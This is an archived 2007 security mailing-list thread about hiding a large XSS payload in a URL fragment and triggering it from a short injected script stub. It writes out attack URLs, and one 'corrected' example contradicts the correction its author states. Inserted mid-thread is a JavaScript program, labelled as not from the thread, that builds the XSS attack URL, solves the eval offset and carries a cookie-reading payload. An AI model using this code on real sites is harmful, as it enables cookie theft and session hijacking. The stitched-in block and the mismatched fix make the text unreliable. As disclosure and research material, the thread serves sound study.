Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS

2007-02-07 Thread Amit Klein
pdp (architect) wrote:
 http://www.gnucitizen.org/blog/playing-in-large

 Basically this article is about how to squeeze more data into size
 restricted, unsanitized field. This technique can also be used to hide
 attackers activities.

It seems that you've stumbled upon something I already disclosed:
http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html

Sorry...
-Amit

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS

2007-02-07 Thread pdp (architect)
Amit,

:) This is not about who did it first. BTW, your example is broken.
location.search does not include the fragment identifier.

Cheers

On 2/7/07, Amit Klein [EMAIL PROTECTED] wrote:
 pdp (architect) wrote:
  http://www.gnucitizen.org/blog/playing-in-large
 
  Basically this article is about how to squeeze more data into size
  restricted, unsanitized field. This technique can also be used to hide
  attackers activities.
 
 It seems that you've stumbled upon something I already disclosed:
 http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html

 Sorry...
 -Amit
-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org



Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS

2007-02-07 Thread Amit Klein
pdp (architect) wrote:
 Amit,

 :) This is not about who did it first. 

Agreed. But it would be nice to receive the credit ;-)
 BTW, your example is broken.
 location.search does not include the fragment identifier.


Guilty as charged. I remember working directly with document.location 
(which includes the hostname and path) when I investigated the issue, 
then when I wrote my text I decided that a more elegant way would be 
with the .search property, but I failed to verify that it actually 
works. Thanks for pointing this out, and here's the formal errata:

In 
http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html, 
the example should be:

http://target.site/vulnscript.cgi?injectme=<script>eval(document.location.substr(...[fill in the offset here]...))</script>#...JS payload here...

Thanks to pdp (architect) for pointing this out.  

Regards,
-Amit


 Cheers

 On 2/7/07, Amit Klein [EMAIL PROTECTED] wrote:
 pdp (architect) wrote:
  http://www.gnucitizen.org/blog/playing-in-large
 
  Basically this article is about how to squeeze more data into size
  restricted, unsanitized field. This technique can also be used to hide
  attackers activities.
 
 It seems that you've stumbled upon something I already disclosed:
 http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html

 Sorry...
 -Amit



Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS

2007-02-07 Thread Amit Klein
pdp (architect) wrote:
 Hei Amit,

 On 2/7/07, Amit Klein [EMAIL PROTECTED] wrote:
 pdp (architect) wrote:
  Amit,
 
  :) This is not about who did it first.

 Agreed. But it would be nice to receive the credit ;-)

 Sorry man. Had I known that you had discussed this before, I would
 definitely have given you the credit. :)


No worries, mate!

 In
 http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html, 

 the example should be:

 http://target.site/vulnscript.cgi?injectme=<script>eval(document.location.substr(...[fill in the offset here]...))</script>#...JS payload here...


Of course, I meant document.location.href.substr(...), i.e.:

http://target.site/vulnscript.cgi?injectme=<script>eval(document.location.substr(...[fill in the offset here]...))</script>#...JS payload here...

-Amit


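Added example, not code from the thread or from either author: it models the browser's document.location with Node's WHATWG URL class (a stated assumption; it serialises URLs the way browsers do) and uses the thread's target.site/vulnscript.cgi?injectme= URL with a constructed payload. It shows why location.search can never return the fragment while location.href (or location.hash) can, and it also goes one step beyond the thread: because the browser percent-encodes the stub's < and > in the query, the substr() offset has to be measured on the serialised href, and since the offset's own digits sit inside the stub, the right value is a fixed point that the code searches for.

```javascript
// Added example (not from the thread). Models document.location with the
// WHATWG URL class, which is a global in Node; target URL is the one from
// the thread, the payload and stub wording are constructed for illustration.

const BASE = 'http://target.site/vulnscript.cgi';   // from the thread
const PARAM = 'injectme';                           // from the thread
const PAYLOAD = 'alert(document.cookie)';           // constructed payload
// The short stub that has to fit in the size-restricted field. OFF is the
// placeholder the thread calls "[fill in the offset here]".
const STUB_TEMPLATE =
  '<script>eval(document.location.href.substr(OFF))</script>';

// Browser-like view of a URL: href, search (query) and hash (fragment).
function locationOf(href) {
  const u = new URL(href);
  return { href: u.href, search: u.search, hash: u.hash };
}

// Assemble the attack URL: stub in the parameter, payload after '#'. The
// fragment is never sent to the server, so it is neither size-limited nor
// logged there.
function buildAttackUrl(base, param, stub, payload) {
  return `${base}?${param}=${stub}#${payload}`;
}

// What eval() would receive for each way of reading the location.
function fragmentVia(href, how, offset = 0) {
  const loc = locationOf(href);
  switch (how) {
    case 'search': return loc.search.substr(offset); // query only, never the fragment
    case 'href':   return loc.href.substr(offset);   // whole URL, fragment included
    case 'hash':   return loc.hash.substr(1);        // fragment without the '#'
    default:       throw new Error('unknown accessor: ' + how);
  }
}

// Index of the payload in the *serialised* href. The browser percent-encodes
// '<' and '>' in the query, so the fragment sits further right than in the
// string the attacker typed; measuring on the serialised form accounts for it.
function payloadOffset(href) {
  return locationOf(href).href.indexOf('#') + 1;
}

// The offset is written inside the stub, so its digit count moves the
// fragment: search for the fixed point where the number written equals the
// real offset. Returns -1 if none is found below maxOffset.
function solveOffset(base, param, payload, maxOffset = 9999) {
  for (let n = 1; n <= maxOffset; n++) {
    const stub = STUB_TEMPLATE.replace('OFF', String(n));
    if (payloadOffset(buildAttackUrl(base, param, stub, payload)) === n) return n;
  }
  return -1;
}

// End-to-end: build the URL with the solved offset and read the fragment
// through each accessor.
function demo() {
  const off = solveOffset(BASE, PARAM, PAYLOAD);
  const stub = STUB_TEMPLATE.replace('OFF', String(off));
  const url = buildAttackUrl(BASE, PARAM, stub, PAYLOAD);
  return {
    url: locationOf(url).href,
    offset: off,
    viaSearch: fragmentVia(url, 'search', off), // '' : fragment absent
    viaHref: fragmentVia(url, 'href', off),     // the payload
    viaHash: fragmentVia(url, 'hash'),          // the payload, no arithmetic
  };
}

console.log(demo());
```

Usage note: solveOffset() is only needed for the substr()-on-href form from the thread; eval(document.location.hash.substr(1)) reads the fragment with no offset at all and is not disturbed by re-encoding of the query, which is the more robust form of the same trick.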

Re: [Full-disclosure] [WEB SECURITY] Useful technique when performing XSS

2007-02-07 Thread pdp (architect)
Hei Amit,

On 2/7/07, Amit Klein [EMAIL PROTECTED] wrote:
 pdp (architect) wrote:
  Amit,
 
  :) This is not about who did it first.

 Agreed. But it would be nice to receive the credit ;-)

Sorry man. Had I known that you had discussed this before, I would
definitely have given you the credit. :)

  BTW, your example is broken.
  location.search does not include the fragment identifier.
 

 Guilty as charged. I remember working directly with document.location
 (which includes the hostname and path) when I investigated the issue,
 then when I wrote my text I decided that a more elegant way would be
 with the .search property, but I failed to verify that it actually
 works. Thanks for pointing this out, and here's the formal errata:

 In
 http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html,
 the example should be:

 http://target.site/vulnscript.cgi?injectme=<script>eval(document.location.substr(...[fill in the offset here]...))</script>#...JS payload here...

 Thanks to pdp (architect) for pointing this out.

 Regards,
 -Amit


  Cheers
 
  On 2/7/07, Amit Klein [EMAIL PROTECTED] wrote:
  pdp (architect) wrote:
   http://www.gnucitizen.org/blog/playing-in-large
  
   Basically this article is about how to squeeze more data into size
   restricted, unsanitized field. This technique can also be used to hide
   attackers activities.
  
  It seems that you've stumbled upon something I already disclosed:
  http://www.webappsec.org/lists/websecurity/archive/2005-10/msg00030.html
 
  Sorry...
  -Amit
-- 
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
